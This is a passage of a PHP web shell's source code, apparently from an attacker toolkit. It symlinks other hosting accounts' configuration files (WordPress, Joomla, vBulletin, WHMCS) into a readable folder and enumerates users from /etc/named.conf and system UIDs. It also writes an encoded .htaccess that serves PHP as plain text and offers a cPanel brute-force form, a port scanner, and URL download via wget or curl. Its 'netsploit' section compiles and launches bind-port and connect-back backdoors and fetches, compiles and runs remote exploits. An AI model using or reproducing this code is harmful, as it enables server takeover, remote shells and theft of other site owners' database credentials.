  2843.                 symlink('/home5/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
  2844.                 symlink('/home5/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
  2845.                 symlink('/home5/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
  2846.                 symlink('/home5/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
  2847.                 symlink('/home5/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
  2848.                 symlink('/home5/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
  2849.                 symlink('/home5/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
  2850.                 symlink('/home5/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
  2851.                 symlink('/home5/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
  2852.                 symlink('/home5/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
  2853.                 symlink('/home5/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
  2854.                 symlink('/home5/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
  2855.                 symlink('/home5/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
  2856.                 symlink('/home5/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
  2857.                 symlink('/home5/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
  2858.                 symlink('/home5/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
  2859.                 symlink('/home5/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
  2860.                 symlink('/home5/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
  2861.                 symlink('/home5/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
  2862.                 symlink('/home5/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
  2863.                 symlink('/home5/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
  2864.                 symlink('/home5/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
  2865.                 symlink('/home5/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
  2866.                 symlink('/home5/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
  2867.                 symlink('/home5/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
  2868.                 symlink('/home5/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
  2869.                 symlink('/home5/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
  2870.                 symlink('/home5/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
  2871.                 symlink('/home5/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
  2872.                 symlink('/home5/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
  2873.                 symlink('/home6/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
  2874.                 symlink('/home6/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
  2875.                 symlink('/home6/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
  2876.                 symlink('/home6/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
  2877.                 symlink('/home6/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
  2878.                 symlink('/home6/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
  2879.                 symlink('/home6/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
  2880.                 symlink('/home6/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
  2881.                 symlink('/home6/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
  2882.                 symlink('/home6/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
  2883.                 symlink('/home6/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
  2884.                 symlink('/home6/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
  2885.                 symlink('/home6/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
  2886.                 symlink('/home6/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
  2887.                 symlink('/home6/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
  2888.                 symlink('/home6/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
  2889.                 symlink('/home6/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
  2890.                 symlink('/home6/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
  2891.                 symlink('/home6/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
  2892.                 symlink('/home6/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
  2893.                 symlink('/home6/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
  2894.                 symlink('/home6/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
  2895.                 symlink('/home6/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
  2896.                 symlink('/home6/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
  2897.                 symlink('/home6/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
  2898.                 symlink('/home6/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
  2899.                 symlink('/home6/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
  2900.                 symlink('/home6/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
  2901.                 symlink('/home6/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
  2902.                 symlink('/home6/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
  2903.                 symlink('/home7/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
  2904.                 symlink('/home7/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
  2905.                 symlink('/home7/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
  2906.                 symlink('/home7/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
  2907.                 symlink('/home7/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
  2908.                 symlink('/home7/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
  2909.                 symlink('/home7/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
  2910.                 symlink('/home7/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
  2911.                 symlink('/home7/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
  2912.                 symlink('/home7/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
  2913.                 symlink('/home7/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
  2914.                 symlink('/home7/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
  2915.                 symlink('/home7/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
  2916.                 symlink('/home7/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
  2917.                 symlink('/home7/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
  2918.                 symlink('/home7/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
  2919.                 symlink('/home7/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
  2920.                 symlink('/home7/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
  2921.                 symlink('/home7/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
  2922.                 symlink('/home7/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
  2923.                 symlink('/home7/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
  2924.                 symlink('/home7/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
  2925.                 symlink('/home7/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
  2926.                 symlink('/home7/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
  2927.                 symlink('/home7/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
  2928.                 symlink('/home7/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
  2929.                 symlink('/home7/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
  2930.                 symlink('/home7/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
  2931.                 symlink('/home7/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
  2932.                 symlink('/home7/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
  2933.         }
  2934.  
  2935.                                 $d0mains = @file("/etc/named.conf");
  2936.                
  2937.                                 if($d0mains)
  2938.                                 {
  2939.                                         mkdir($fn);
  2940.                                         chdir($fn);
  2941.                                                                                
  2942.                                         foreach($d0mains as $d0main)
  2943.                                         {
  2944.                                                 if(eregi("zone",$d0main))
  2945.                                                 {
  2946.                                                         preg_match_all('#zone "(.*)"#', $d0main, $domains);
  2947.                                                         flush();
  2948.                                                                
  2949.                                                         if(strlen(trim($domains[1][0])) > 2)
  2950.                                                         {
  2951.                                                                 $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
  2952.                                                                
  2953.                                                                 syml($user['name'],$domains[1][0]);                                    
  2954.                                                         }
  2955.                                                 }
  2956.                                         }
  2957.                                         echo "<center><font color=lime size=3>[ Done ]</font></center>";
  2958.                                         echo "<br><center><a href=$fn/ target=_blank><font size=3 color=#009900>| Go Here |</font></a></center>";
  2959.                                 }
  2960.                                 else
  2961.                                 {
  2962.                                         mkdir($fn);
  2963.                                         chdir($fn);
  2964.                                         $temp = "";
  2965.                                         $val1 = 0;
  2966.                                         $val2 = 1000;
  2967.                                         for(;$val1 <= $val2;$val1++)
  2968.                                         {
  2969.                                                 $uid = @posix_getpwuid($val1);
  2970.                                                 if ($uid)
  2971.                                                         $temp .= join(':',$uid)."\n";
  2972.                                          }
  2973.                                          echo '<br/>';
  2974.                                          $temp = trim($temp);
  2975.                                          
  2976.                                          $file5 = fopen("test.txt","w");
  2977.                                          fputs($file5,$temp);
  2978.                                          fclose($file5);
  2979.  
  2980. $htaccess =
  2981. 'T3B0aW9ucyBhbGwgCkRpcmVjdG9yeUluZGV4IHJlYWRtZS5odG1sIApBZGRUeXBlIHRleHQvcGxh
  2982. aW4gLnBocCAKQWRkSGFuZGxlciBzZXJ2ZXItcGFyc2VkIC5waHAgCkFkZFR5cGUgdGV4dC9wbGFp
  2983. biAuaHRtbCAKQWRkSGFuZGxlciB0eHQgLmh0bWwgClJlcXVpcmUgTm9uZSAKU2F0aXNmeSBBbnk=
  2984. ';
  2985. $file = fopen(".htaccess","w+");
  2986. $write = fwrite ($file ,base64_decode($htaccess));
  2987.                                          
  2988.                                          $file = fopen("test.txt", "r") or exit("Unable to open file!");
  2989.                                          while(!feof($file))
  2990.                                          {
  2991.                                                 $s = fgets($file);
  2992.                                                 $matches = array();
  2993.                                                 $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
  2994.                                                 $matches = str_replace("home/","",$matches[1]);
  2995.                                                 if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
  2996.                                                         continue;
  2997.                                                 syml($matches,$matches);
  2998.                                          }
  2999.                                         fclose($file);
  3000.                                         echo "</table>";
  3001.                                         unlink("test.txt");
  3002.                                         echo "<center><font color=lime size=3>[ Done ]</font></center>";
  3003.                                         echo "<br><center><a href=$fn/ target=_blank><font size=3 color=#009900>| Go Here |</font></a></center>";
  3004.                                 }
  3005. echo "<hr><center><b><a href=".$_SERVER['PHP_SELF'].">BACK</a>";
  3006. exit;
  3007. }
  3008. ?>
  3009. <form method="POST" target="_blank">
  3010.         <strong>
  3011. <input name="page" type="hidden" value="find"><table>                                  
  3012.     </strong><br><br><center><font size="5" style="italic" color="#00ff00">=[ Cpanel BruteForce ]=</font></center><br><br>
  3013.     <table width="600" border="0" cellpadding="3" cellspacing="1" align="center">
  3014.         <tr>
  3015.         <td valign="top" bgcolor="#151515" class="style2" style="width: 139px">
  3016.         <center><b><font size="5" style="italic" color="#00ff00">Cpanel BruteForce</font></b></center></td></tr>
  3017.     <tr>
  3018.     <td>
  3019.     <table width="100%" border="0" cellpadding="3" cellspacing="1" align="center">
  3020.     <td valign="top" bgcolor="#151515" class="style2" style="width: 139px">
  3021.         <strong>User :</strong></td>
  3022.     <td valign="top" bgcolor="#151515" colspan="5"><strong><textarea cols="79" class ='inputz' rows="10" name="usernames"><?php system('ls /var/mail');?></textarea></strong></td>
  3023.     </tr>
  3024.     <tr>
  3025.     <td valign="top" bgcolor="#151515" class="style2" style="width: 139px">
  3026.         <strong>Pass :</strong></td>
  3027.     <td valign="top" bgcolor="#151515" colspan="5"><strong><textarea cols="79" class ='inputz' rows="10" name="passwords"></textarea></strong></td>
  3028.     </tr>
  3029.     <tr>
  3030.     <td valign="top" bgcolor="#151515" class="style2" style="width: 139px">
  3031.         <strong>Type :</strong></td>
  3032.     <td valign="top" bgcolor="#151515" colspan="5">
  3033.     <span class="style2"><strong>Simple : </strong> </span>
  3034.         <strong>
  3035.         <input type="radio" name="type" value="simple" checked="checked" class="style3"></strong>
  3036.     <font class="style2"><strong>/etc/passwd : </strong> </font>
  3037.         <strong>
  3038.         <input type="radio" name="type" value="passwd" class="style3"></strong><span class="style3"><strong>
  3039.         </strong>
  3040.         </span>
  3041.     </td>
  3042.     </tr>
  3043.     <tr>
  3044.     <td valign="top" bgcolor="#151515" style="width: 139px"></td>
  3045.     <td valign="top" bgcolor="#151515"  colspan="5"><strong><input class ='inputzbut' type="submit" value="start">
  3046.     </strong>
  3047.     </td>
  3048.     <tr>
  3049. </form>
  3050. <tr>
  3051.     <td valign="top" bgcolor="#151515" class="style1" colspan="6"><strong>Get Config :</strong></td>
  3052.                                 </tr>
  3053. <form method="POST" target="_blank">
  3054.         <strong>
  3055. <input name="mendapatkan" type="hidden" value="passwd">                                
  3056.     </strong>
  3057.     <tr>
  3058.     <td valign="top" bgcolor="#151515" style="width: 139px"><strong>Folder Name :</strong></td>
  3059.     <td valign="top" bgcolor="#151515"><strong><input class ='inputz' size="35" name="foldername" type="text"></strong></td>
  3060.         </strong>
  3061.     </td>
  3062.     </tr>
  3063.     <tr>
  3064.     <td valign="top" bgcolor="#151515" style="width: 139px"></td>
  3065.     <td valign="top" bgcolor="#151515" colspan="5"><strong><input class ='inputzbut' type="submit" value="GO">
  3066.     </strong>
  3067.     </td>
  3068.     <tr>
  3069. </form>  
  3070. <tr>
  3071.     <td valign="top" bgcolor="#151515" class="style1" colspan="6"><strong>Get Wordlist</strong></td>
  3072.                                 </tr>
  3073. <form method="POST" target="_blank">
  3074.         <strong>
  3075. <input name="pass" type="hidden" value="password">                                     
  3076.     </strong>
  3077.     <tr>
  3078.     <td valign="top" bgcolor="#151515" style="width: 139px"><strong>Url Config :</strong></td>
  3079.     <td valign="top" bgcolor="#151515"><strong><input class ='inputz' size="35" name="url" type="text"></strong></td>
  3080.         </strong>
  3081.     </td>
  3082.     </tr>
  3083.     <tr>
  3084.     <td valign="top" bgcolor="#151515" style="width: 139px"></td>
  3085.     <td valign="top" bgcolor="#151515" colspan="5"><strong><input class ='inputzbut' type="submit" value="GO">
  3086.     </strong>
  3087.     </td>
  3088.     <tr>
  3089. </form>
  3090. <tr>
  3091.     <td valign="top" bgcolor="#151515" class="style1" colspan="6"><strong>Info
  3092.         Security</strong></td>
  3093.                                 </tr>
  3094.     <tr>
  3095.     <td valign="top" bgcolor="#151515" style="width: 139px"><strong>Safe Mode</strong></td>
  3096.     <td valign="top" bgcolor="#151515" colspan="5">
  3097.         <strong>
  3098. <?php
  3099. $safe_mode = ini_get('safe_mode');
  3100. if($safe_mode=='1')
  3101. {
  3102. echo 'ON';
  3103. }else{
  3104. echo 'OFF';
  3105. }
  3106.  
  3107. ?>     
  3108.         </strong>      
  3109.         </td>
  3110.                                 </tr>
  3111.     <tr>
  3112.     <td valign="top" bgcolor="#151515" style="width: 139px"><strong>Desible Function</strong></td>
  3113.     <td valign="top" bgcolor="#151515" colspan="5">
  3114.         <strong>
  3115. <form method="POST" target="_blank">
  3116.         <strong>
  3117. <input name="matikan" type="hidden" value="sekatan">                                   
  3118.     </strong>
  3119.  
  3120. <?php
  3121. if('==($func=@ini_get('disable_functions')))
  3122. {
  3123. echo "<font color=#00ff00>No Security for Function</font></b>";
  3124. }else{
  3125. echo '<script>alert("Please see below and press >Please Click Here First!<");</script>';
  3126. echo "<font color=red>$func</font></b>";
  3127. echo '<tr><td valign="top" bgcolor="#151515" style="width: 139px"></td>';
  3128. echo '<td valign="top" bgcolor="#151515" colspan="5"><strong><input type="submit" value="Please Click Here First!">
  3129.     </strong>
  3130.     </td></tr>';
  3131. }
  3132. ?></strong></td></tr></table></table></table>
  3133. <?
  3134. }
  3135.  
  3136. /////////////////////////////////////////////////////////
  3137. elseif(isset($_GET['x']) && ($_GET['x'] == 'whois'))
  3138.    {
  3139.    ?>
  3140.    <form action="?y=<?php echo $pwd; ?>&x=whois" method="post">
  3141.    <?php
  3142.    @set_time_limit(0);
  3143.    @error_reporting(0);
  3144.    function sws_domain_info($site)
  3145.    {
  3146.    $getip = @file_get_contents("http://networktools.nl/whois/$site");
  3147.    flush();
  3148.    $ip = @findit($getip,'<pre>','</pre>');
  3149.    return $ip;
  3150.    flush();
  3151.    }
  3152.    function sws_net_info($site)
  3153.    {
  3154.    $getip = @file_get_contents("http://networktools.nl/asinfo/$site");
  3155.    $ip = @findit($getip,'<pre>','</pre>');
  3156.    return $ip;
  3157.    flush();
  3158.    }
  3159.    function sws_site_ser($site)
  3160.    {
  3161.    $getip = @file_get_contents("http://networktools.nl/reverseip/$site");
  3162.    $ip = @findit($getip,'<pre>','</pre>');
  3163.    return $ip;
  3164.    flush();
  3165.    }
  3166.    function sws_sup_dom($site)
  3167.    {
  3168.    $getip = @file_get_contents("http://www.magic-net.info/dns-and-ip-tools.dnslookup?subd=".$site."&Search+subdomains=Find+subdomains");
  3169.    $ip = @findit($getip,'<strong>Nameservers found:</strong>','<script type="text/javascript">');
  3170.    return $ip;
  3171.    flush();
  3172.    }
  3173.    function sws_port_scan($ip)
  3174.    {
  3175.    $list_post = array('80','21','22','2082','25','53','110','443','143');
  3176.    foreach ($list_post as $o_port)
  3177.    {
  3178.    $connect = @fsockopen($ip,$o_port,$errno,$errstr,5);
  3179.    if($connect)
  3180.    {
  3181.    echo " $ip : $o_port ??? <u style=\"color: #00ff00\">Open</u> <br /><br />";
  3182.    flush();
  3183.    }
  3184.    }
  3185.    }
  3186.    function findit($mytext,$starttag,$endtag) {
  3187.    $posLeft = @stripos($mytext,$starttag)+strlen($starttag);
  3188.    $posRight = @stripos($mytext,$endtag,$posLeft+1);
  3189.    return @substr($mytext,$posLeft,$posRight-$posLeft);
  3190.    flush();
  3191.    }
  3192.    echo '<br><br><center>';
  3193.    echo '
  3194.     <br />
  3195.     <div class="sc"><form method="post"><table class="tabnet">
  3196.         <tr><th colspan="5">Website Whois</th></tr>
  3197.     <tr><td>Site to scan </td><td>:</td><td><input type="text" name="site" size="50" style="color:#00ff00;background-color:#000000" class="inputz" value="site.com" /> &nbsp <input class="inputzbut" type="submit" style="color:#00ff00;background-color:#000000" name="scan" value="Scan !" /></td></tr>
  3198.     </table></form></div>';
  3199.    if(isset($_POST['scan']))
  3200.    {
  3201.    $site = @htmlentities($_POST['site']);
  3202.    if (empty($site)){die('<br /><br /> Not add IP .. !');}
  3203.    $ip_port = @gethostbyname($site);
  3204.    echo "
  3205.    <br /><div class=\"sc2\">Scanning [ $site ip $ip_port ] ... </div>
  3206.    <div class=\"tit\"> <br /><br />|-------------- Port Server ------------------| <br /></div>
  3207.    <div class=\"ru\"> <br /><br /><pre>
  3208.    ";
  3209.    echo "".sws_port_scan($ip_port)." </pre></div> ";
  3210.    flush();
  3211.    echo "<div class=\"tit\"><br /><br />|-------------- Domain Info ------------------| <br /> </div>
  3212.    <div class=\"ru\">
  3213.    <pre>".sws_domain_info($site)."</pre></div>";
  3214.    flush();
  3215.    echo "
  3216.    <div class=\"tit\"> <br /><br />|-------------- Network Info ------------------| <br /></div>
  3217.    <div class=\"ru\">
  3218.    <pre>".sws_net_info($site)."</pre> </div>";
  3219.    flush();
  3220.    echo "<div class=\"tit\"> <br /><br />|-------------- subdomains Server ------------------| <br /></div>
  3221.    <div class=\"ru\">
  3222.    <pre>".sws_sup_dom($site)."</pre> </div>";
  3223.    flush();
  3224.    echo "<div class=\"tit\"> <br /><br />|-------------- Site Server ------------------| <br /></div>
  3225.    <div class=\"ru\">
  3226.    <pre>".sws_site_ser($site)."</pre> </div>
  3227.    <div class=\"tit\"> <br /><br />|-------------- END ------------------| <br /></div>";
  3228.    flush();
  3229.    }
  3230.    echo '</center>';
  3231.    }
  3232.    /////////////////////////////////////////
  3233.    
  3234.    /////////////////////////////////////////
  3235. elseif(isset($_GET['x']) && ($_GET['x'] == 'upload')){
  3236. if(isset($_POST['uploadcomp'])){
  3237.         if(is_uploaded_file($_FILES['file']['tmp_name'])){
  3238.                 $path = magicboom($_POST['path']);
  3239.                 $fname = $_FILES['file']['name'];
  3240.                 $tmp_name = $_FILES['file']['tmp_name'];
  3241.                 $pindah = $path.$fname;
  3242.                 $stat = @move_uploaded_file($tmp_name,$pindah);        
  3243.                 if ($stat) {
  3244.                         $msg = "file uploaded to $pindah";
  3245.                 }
  3246.                 else $msg = "failed to upload $fname";
  3247.         }
  3248.         else $msg = "failed to upload $fname";
  3249. }
  3250. elseif(isset($_POST['uploadurl'])){
  3251.         $pilihan = trim($_POST['pilihan']);
  3252.         $wurl = trim($_POST['wurl']);
  3253.         $path = magicboom($_POST['path']);
  3254.         $namafile = download($pilihan,$wurl);
  3255.         $pindah = $path.$namafile;
  3256.         if(is_file($pindah)) {
  3257.                 $msg = "file uploaded to $pindah";
  3258.         }
  3259.         else $msg = "failed to upload $namafile";
  3260.  
  3261. }
  3262. ?>
  3263. <form action="?y=<?php echo $pwd; ?>&amp;x=upload" enctype="multipart/form-data" method="post">
  3264. <table class="tabnet" style="width:320px;padding:0 1px;">
  3265. <tr><th colspan="2">Upload from computer</th></tr>
  3266. <tr><td colspan="2"><p style="text-align:center;"><input style="color:#000000;" type="file" name="file" /><input type="submit" name="uploadcomp" class="inputzbut" value="Go" style="width:80px;"></p></td>
  3267. <tr><td colspan="2"><input type="text" class="inputz" style="width:99%;" name="path" value="<?php echo $pwd; ?>" /></td></tr>
  3268. </tr>
  3269. </table></form>
  3270. <table class="tabnet" style="width:320px;padding:0 1px;">
  3271. <tr><th colspan="2">Upload from url</th></tr>
  3272. <tr><td colspan="2"><form method="post" style="margin:0;padding:0;" actions="?y=<?php echo $pwd; ?>&amp;x=upload">
  3273. <table><tr><td>url</td><td><input class="inputz" type="text" name="wurl" style="width:250px;" value="http://www.some-code/exploits.c"></td></tr>
  3274. <tr><td colspan="2"><input type="text" class="inputz" style="width:99%;" name="path" value="<?php echo $pwd; ?>" /></td></tr>
  3275. <tr><td><select size="1" class="inputz" name="pilihan">
  3276. <option value="wwget">wget</option>
  3277. <option value="wlynx">lynx</option>
  3278. <option value="wfread">fread</option>
  3279. <option value="wfetch">fetch</option>
  3280. <option value="wlinks">links</option>
  3281. <option value="wget">GET</option>
  3282. <option value="wcurl">curl</option>
  3283. </select></td><td colspan="2"><input type="submit" name="uploadurl" class="inputzbut" value="Go" style="width:246px;"></td></tr></form></table></td>
  3284. </tr>
  3285. </table>
  3286. <div style="text-align:center;margin:2px;"><?php echo $msg; ?></div>
  3287. <?php }
  3288. elseif(isset($_GET['x']) && ($_GET['x'] == 'netsploit')){
  3289.  
  3290. // bind connect with c
  3291. if (isset($_POST['bind']) && !empty($_POST['port']) && !empty($_POST['bind_pass']) && ($_POST['use'] == 'C')) {
  3292.         $port = trim($_POST['port']);
  3293.         $passwrd = trim($_POST['bind_pass']);
  3294.         tulis("bdc.c",$port_bind_bd_c);
  3295.         exe("gcc -o bdc bdc.c");
  3296.         exe("chmod 777 bdc");
  3297.         @unlink("bdc.c");
  3298.         exe("./bdc ".$port." ".$passwrd." &");
  3299.         $scan = exe("ps aux");
  3300.         if(eregi("./bdc $por",$scan)){ $msg = "<p>Process found running, backdoor setup successfully.</p>"; }
  3301.         else { $msg =  "<p>Process not found running, backdoor not setup successfully.</p>"; }
  3302. }
  3303. // bind connect with perl
  3304. elseif (isset($_POST['bind']) && !empty($_POST['port']) && !empty($_POST['bind_pass']) && ($_POST['use'] == 'Perl')) {
  3305.         $port = trim($_POST['port']);
  3306.         $passwrd = trim($_POST['bind_pass']);
  3307.         tulis("bdp",$port_bind_bd_pl);
  3308.         exe("chmod 777 bdp");
  3309.         $p2=which("perl");
  3310.         exe($p2." bdp ".$port." &");
  3311.         $scan = exe("ps aux");
  3312.         if(eregi("$p2 bdp $port",$scan)){ $msg = "<p>Process found running, backdoor setup successfully.</p>"; }
  3313.         else { $msg = "<p>Process not found running, backdoor not setup successfully.</p>"; }
  3314. }
  3315. // back connect with c
  3316. elseif (isset($_POST['backconn']) && !empty($_POST['backport']) && !empty($_POST['ip']) && ($_POST['use'] == 'C')) {
  3317.         $ip = trim($_POST['ip']);
  3318.         $port = trim($_POST['backport']);
  3319.         tulis("bcc.c",$back_connect_c);
  3320.         exe("gcc -o bcc bcc.c");
  3321.         exe("chmod 777 bcc");
  3322.         @unlink("bcc.c");
  3323.         exe("./bcc ".$ip." ".$port." &");
  3324.         $msg = "Now script try connect to ".$ip." port ".$port." ...";
  3325. }
  3326. // back connect with perl
  3327. elseif (isset($_POST['backconn']) && !empty($_POST['backport']) && !empty($_POST['ip']) && ($_POST['use'] == 'Perl')) {
  3328.         $ip = trim($_POST['ip']);
  3329.         $port = trim($_POST['backport']);
  3330.         tulis("bcp",$back_connect);
  3331.         exe("chmod +x bcp");
  3332.         $p2=which("perl");
  3333.         exe($p2." bcp ".$ip." ".$port." &");
  3334.         $msg = "Now script try connect to ".$ip." port ".$port." ...";
  3335. }
  3336. elseif (isset($_POST['expcompile']) && !empty($_POST['wurl']) && !empty($_POST['wcmd']))
  3337. {
  3338.         $pilihan = trim($_POST['pilihan']);
  3339.         $wurl = trim($_POST['wurl']);
  3340.         $namafile = download($pilihan,$wurl);
  3341.         if(is_file($namafile)) {
  3342.        
  3343.         $msg = exe($wcmd);
  3344.         }
  3345.         else $msg = "error: file not found $namafile";
  3346. }
  3347.  
  3348. ?>
  3349. <table class="tabnet">
  3350. <tr><th>Port Binding</th><th>Connect Back</th><th>Load and Exploit</th></tr>
  3351. <tr>
  3352. <td>
  3353. <table>
  3354. <form method="post" action="?y=<?php echo $pwd; ?>&amp;x=netsploit">
  3355. <tr><td>Port</td><td><input class="inputz" type="text" name="port" size="26" value="<?php echo $bindport ?>"></td></tr>
  3356. <tr><td>Password</td><td><input class="inputz" type="text" name="bind_pass" size="26" value="<?php echo $bindport_pass; ?>"></td></tr>
  3357. <tr><td>Use</td><td style="text-align:justify"><p><select class="inputz" size="1" name="use"><option value="Perl">Perl</option><option value="C">C</option></select>
  3358. <input class="inputzbut" type="submit" name="bind" value="Bind" style="width:120px"></td></tr></form>
  3359. </table>
  3360. </td>
  3361. <td>
  3362. <table>
  3363. <form method="post" action="?y=<?php echo $pwd; ?>&amp;x=netsploit">
  3364. <tr><td>IP</td><td><input class="inputz" type="text" name="ip" size="26" value="<?php echo ((getenv('REMOTE_ADDR')) ? (getenv('REMOTE_ADDR')) : ("127.0.0.1")); ?>"></td></tr>
  3365. <tr><td>Port</td><td><input class="inputz" type="text" name="backport" size="26" value="<?php echo $bindport; ?>"></td></tr>
  3366. <tr><td>Use</td><td style="text-align:justify"><p><select size="1" class="inputz" name="use"><option value="Perl">Perl</option><option value="C">C</option></select>
  3367. <input type="submit" name="backconn" value="Connect" class="inputzbut" style="width:120px"></td></tr></form>
  3368. </table>
  3369. </td>
  3370. <td>
  3371. <table>
  3372. <form method="post" action="?y=<?php echo $pwd; ?>&amp;x=netsploit">
  3373. <tr><td>url</td><td><input class="inputz" type="text" name="wurl" style="width:250px;" value="www.some-code/exploits.c"></td></tr>
  3374. <tr><td>cmd</td><td><input class="inputz" type="text" name="wcmd" style="width:250px;" value="gcc -o exploits exploits.c;chmod +x exploits;./exploits;"></td>
  3375. </tr>
  3376. <tr><td><select size="1" class="inputz" name="pilihan">
  3377. <option value="wwget">wget</option>
  3378. <option value="wlynx">lynx</option>
  3379. <option value="wfread">fread</option>
  3380. <option value="wfetch">fetch</option>
  3381. <option value="wlinks">links</option>
  3382. <option value="wget">GET</option>
  3383. <option value="wcurl">curl</option>
